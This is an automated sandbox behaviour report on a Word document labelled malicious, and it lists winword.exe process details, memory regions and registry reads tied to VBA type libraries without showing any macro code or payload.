Malicious Word Doc. Uses Multiple Sandbox Evasion Techniques

Monitored Processes

Behavior Information - Grouped by Category

Process #1: winword.exe

(Host: 188, Network: 0)

Information	Value
ID	#1
File Name	c:\program files\microsoft office\root\office16\winword.exe
Command Line	"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:00:08, Reason: Analysis Target
Unmonitor	End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration	00:10:05

OS Process Information

Information	Value
PID	0x954
Parent PID	0x584 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 9DC 0x 9D8 0x 9D4 0x 9D0 0x 9CC 0x 9C8 0x 9C0 0x 9AC 0x 99C 0x 994 0x 990 0x 958 0x 9F8 0x 9FC 0x A00 0x A04 0x A08 0x A0C 0x A4C 0x A58 0x 714 0x 93C 0x 8F8 0x 124 0x 924 0x B04

Region

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x00020fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00043fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000000f0000	0x000f0000	0x000f0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000100000	0x00100000	0x00106fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000110000	0x00110000	0x00111fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000120000	0x00120000	0x00120fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000130000	0x00130000	0x00130fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000140000	0x00140000	0x00141fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000150000	0x00150000	0x00151fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000160000	0x00160000	0x0016ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000170000	0x00170000	0x00172fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000180000	0x00180000	0x0018ffff	Private Memory	-	Region Actions
private_0x0000000000190000	0x00190000	0x0028ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000290000	0x00290000	0x00292fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000002a0000	0x002a0000	0x002a2fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000002b0000	0x002b0000	0x002b2fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000002c0000	0x002c0000	0x002c2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000002d0000	0x002d0000	0x0030ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000310000	0x00310000	0x0031efff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000320000	0x00320000	0x00321fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000360000	0x00360000	0x0045ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000460000	0x00460000	0x0055ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000560000	0x00560000	0x006e7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000006f0000	0x006f0000	0x00870fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000880000	0x00880000	0x01c7ffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01c80000	0x01f4efff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000001f50000	0x01f50000	0x02342fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002350000	0x02350000	0x0244ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002450000	0x02450000	0x0252efff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002540000	0x02540000	0x0254ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002580000	0x02580000	0x02580fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002590000	0x02590000	0x0268ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002690000	0x02690000	0x0270ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002780000	0x02780000	0x02784fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000002790000	0x02790000	0x02790fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000027a0000	0x027a0000	0x027a0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000027b0000	0x027b0000	0x027b0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000027c0000	0x027c0000	0x028bffff	Private Memory	Readable, Writable	Region Actions
kernelbase.dll.mui	0x028c0000	0x0297ffff	Memory Mapped File	Readable, Writable	Region Actions
pagefile_0x0000000002980000	0x02980000	0x02981fff	Pagefile Backed Memory	Readable	Region Actions
cfgmgr32.dll	0x02990000	0x029c5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00000000029d0000	0x029d0000	0x029dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000029e0000	0x029e0000	0x02adffff	Private Memory	Readable, Writable	Region Actions
msxml6r.dll	0x02ae0000	0x02ae0fff	Memory Mapped File	Readable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db	0x02af0000	0x02b14fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002c20000	0x02c20000	0x02e1ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002e20000	0x02e20000	0x02e20fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000002e30000	0x02e30000	0x02e31fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002e40000	0x02e40000	0x02e40fff	Private Memory	Readable, Writable	Region Actions
c_1255.nls	0x02e50000	0x02e60fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002e70000	0x02e70000	0x02e8ffff	Private Memory	-	Region Actions
onbttnwd.dll	0x02e90000	0x02e94fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002ea0000	0x02ea0000	0x02ebefff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002ea0000	0x02ea0000	0x02eaffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002ec0000	0x02ec0000	0x02f3ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002f40000	0x02f40000	0x0303ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003040000	0x03040000	0x0313ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003140000	0x03140000	0x0315ffff	Private Memory	-	Region Actions
private_0x0000000003160000	0x03160000	0x0317ffff	Private Memory	-	Region Actions
stdole2.tlb	0x03180000	0x03183fff	Memory Mapped File	Readable	Region Actions
private_0x0000000003190000	0x03190000	0x0328ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003290000	0x03290000	0x0338ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000003390000	0x03390000	0x0378ffff	Pagefile Backed Memory	Readable	Region Actions
staticcache.dat	0x03790000	0x040bffff	Memory Mapped File	Readable	Region Actions
private_0x00000000040c0000	0x040c0000	0x040dffff	Private Memory	-	Region Actions
private_0x00000000040f0000	0x040f0000	0x0410efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004100000	0x04100000	0x04101fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004110000	0x04110000	0x0412efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004120000	0x04120000	0x04121fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004130000	0x04130000	0x0422ffff	Private Memory	Readable, Writable	Region Actions
segoeui.ttf	0x04230000	0x042aefff	Memory Mapped File	Readable	Region Actions
private_0x00000000042b0000	0x042b0000	0x042cdfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000042c0000	0x042c0000	0x042c1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000042e0000	0x042e0000	0x042effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004310000	0x04310000	0x0432efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004320000	0x04320000	0x04321fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004350000	0x04350000	0x0436efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004360000	0x04360000	0x04361fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004390000	0x04390000	0x04391fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000043a0000	0x043a0000	0x043a1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000043d0000	0x043d0000	0x043dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000043e0000	0x043e0000	0x044dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000044e0000	0x044e0000	0x044fefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000044f0000	0x044f0000	0x044f1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004500000	0x04500000	0x0451dfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004510000	0x04510000	0x04511fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004520000	0x04520000	0x0459ffff	Private Memory	Readable, Writable, Executable	Region Actions
pagefile_0x00000000045a0000	0x045a0000	0x04d9ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000004da0000	0x04da0000	0x04dc0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004da0000	0x04da0000	0x04da1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004dc0000	0x04dc0000	0x04dc1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004e60000	0x04e60000	0x04e7efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004e60000	0x04e60000	0x04e61fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004e80000	0x04e80000	0x04e87fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000004e90000	0x04e90000	0x04f8ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005030000	0x05030000	0x05032fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000005050000	0x05050000	0x0506efff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000005050000	0x05050000	0x05051fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000005060000	0x05060000	0x05061fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000005080000	0x05080000	0x0517ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005090000	0x05090000	0x05091fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000050a0000	0x050a0000	0x050a1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000050c0000	0x050c0000	0x050c1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000050d0000	0x050d0000	0x050d1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000050f0000	0x050f0000	0x050f1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000005100000	0x05100000	0x05101fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000005120000	0x05120000	0x05121fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000005130000	0x05130000	0x05131fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000005150000	0x05150000	0x05151fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000005160000	0x05160000	0x05161fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000051c0000	0x051c0000	0x052bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000051c0000	0x051c0000	0x051c1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000051e0000	0x051e0000	0x051e1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000052d0000	0x052d0000	0x052dffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005360000	0x05360000	0x0539ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000053a0000	0x053a0000	0x0549ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000054a0000	0x054a0000	0x0589ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000058a0000	0x058a0000	0x0689ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000006960000	0x06960000	0x06963fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000006970000	0x06970000	0x069effff	Private Memory	Readable, Writable	Region Actions
private_0x00000000069f0000	0x069f0000	0x069f3fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000006a00000	0x06a00000	0x06a03fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000006a10000	0x06a10000	0x06a8ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006a90000	0x06a90000	0x06b8ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006b90000	0x06b90000	0x06b93fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000006ba0000	0x06ba0000	0x06ba3fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000006bb0000	0x06bb0000	0x06c2ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006cb0000	0x06cb0000	0x06cc0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000006cd0000	0x06cd0000	0x06cd0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000006ce0000	0x06ce0000	0x06ddffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006e00000	0x06e00000	0x06e7ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006e80000	0x06e80000	0x0727ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007280000	0x07280000	0x07a7ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007a80000	0x07a80000	0x07e80fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007e90000	0x07e90000	0x08290fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000082a0000	0x082a0000	0x086a0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000086b0000	0x086b0000	0x088affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000088b0000	0x088b0000	0x08d6ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000008d70000	0x08d70000	0x0916ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000009ac0000	0x09ac0000	0x09ad0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000009ac0000	0x09ac0000	0x09b1afff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000009ae0000	0x09ae0000	0x09ae1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000009b00000	0x09b00000	0x09b01fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000009b20000	0x09b20000	0x09b21fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000009fa0000	0x09fa0000	0x09ffafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000009fa0000	0x09fa0000	0x09ffafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000009fa0000	0x09fa0000	0x09fa1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000009fc0000	0x09fc0000	0x09fc1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000000a000000	0x0a000000	0x0a001fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000000a370000	0x0a370000	0x0a371fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000000a700000	0x0a700000	0x0abb1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000000ab90000	0x0ab90000	0x0ab91fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000000abb0000	0x0abb0000	0x0abb1fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000000cec0000	0x0cec0000	0x0cfbffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000000f660000	0x0f660000	0x0f75ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000036e80000	0x36e80000	0x36e8ffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x000000006fff0000	0x6fff0000	0x6fffffff	Private Memory	Readable, Writable, Executable	Region Actions
osppc.dll	0x744a0000	0x744d2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76e70000	0x76f69fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76f70000	0x7708efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77238fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x77260000	0x77266fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
winword.exe	0x13fc00000	0x13fddafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000007febe960000	0x7febe960000	0x7febe96ffff	Private Memory	Readable, Writable, Executable	Region Actions
chart.dll	0x7fee39d0000	0x7fee44c8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
riched20.dll	0x7fee44d0000	0x7fee46f2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
onbttnwd.dll	0x7fee4860000	0x7fee4899fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoreei.dll	0x7fee48a0000	0x7fee4938fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwrite.dll	0x7fee4940000	0x7fee4abdfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d10warp.dll	0x7fee4ac0000	0x7fee4c8ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msptls.dll	0x7fee4c90000	0x7fee4dfffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msointl.dll	0x7fee4e00000	0x7fee4f7afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wwintl.dll	0x7fee4f80000	0x7fee503bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msores.dll	0x7fee5040000	0x7fee9e7efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso99lres.dll	0x7fee9e80000	0x7feea7a0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso40uires.dll	0x7feea7b0000	0x7feeaab7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso.dll	0x7feeaac0000	0x7feebd9bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso99lwin32client.dll	0x7feebda0000	0x7feec56bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso40uiwin32client.dll	0x7feec570000	0x7feece5afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso30win32client.dll	0x7feece60000	0x7feed2d7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso20win32client.dll	0x7feed2e0000	0x7feed5e3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oart.dll	0x7feed5f0000	0x7feee75bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d11.dll	0x7feee7d0000	0x7feee895fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wwlib.dll	0x7feee8a0000	0x7fef0c3efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoree.dll	0x7fef10e0000	0x7fef114efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sppc.dll	0x7fef1150000	0x7fef1176fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mlang.dll	0x7fef1260000	0x7fef129afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
npmproxy.dll	0x7fef3780000	0x7fef378bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-core-file-l1-2-0.dll	0x7fef3bb0000	0x7fef3bb2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-core-processthreads-l1-1-1.dll	0x7fef3bc0000	0x7fef3bc2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-core-synch-l1-2-0.dll	0x7fef3d90000	0x7fef3d92fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-core-localization-l1-2-0.dll	0x7fef3da0000	0x7fef3da2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-core-file-l2-1-0.dll	0x7fef3db0000	0x7fef3db2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
api-ms-win-core-timezone-l1-1-0.dll	0x7fef3dc0000	0x7fef3dc2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ucrtbase.dll	0x7fef3dd0000	0x7fef3ec1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msimg32.dll	0x7fef3ed0000	0x7fef3ed6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
c2r64.dll	0x7fef3ee0000	0x7fef4008fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
appvisvstream64.dll	0x7fef4010000	0x7fef4089fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
appvisvsubsystems64.dll	0x7fef4090000	0x7fef42c5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msxml6.dll	0x7fef4a60000	0x7fef4c51fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winspool.drv	0x7fef4cf0000	0x7fef4d60fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msointl30.dll	0x7fef5270000	0x7fef527efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wbemsvc.dll	0x7fef5740000	0x7fef5753fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wbemprox.dll	0x7fef5a40000	0x7fef5a4efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdsapi.dll	0x7fef5a50000	0x7fef5a76fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000007fffff74000	0x7fffff74000	0x7fffff75fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000007fffff7c000	0x7fffff7c000	0x7fffff7dfff	Private Memory	Readable, Writable	Region Actions Download Dump
For performance reasons, the remaining 301 entries are omitted. The remaining entries can be found in flog.txt.

Host Behavior

Registry (63)

Operation	Key	Additional Information	Count	Logfile
Create Key	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\Licenses	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409	-	2	Fn
Open Key	win64	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib	-	2	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0	-	2	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64\win64	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib	-	2	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0	-	2	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0	-	1	Fn
Read Value	HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7	data = }	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common	value_name = RequireDeclaration, data = 139, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common	value_name = CompileOnDemand, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common	value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common	value_name = BackGroundCompile, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common	value_name = BreakOnAllErrors, data = 255, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common	value_name = BreakOnServerErrors, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64	data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB	2	Fn
Read Value	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64	data = C:\Windows\system32\stdole2.tlb	2	Fn
Read Value	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64	data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL	2	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	-	1	Fn
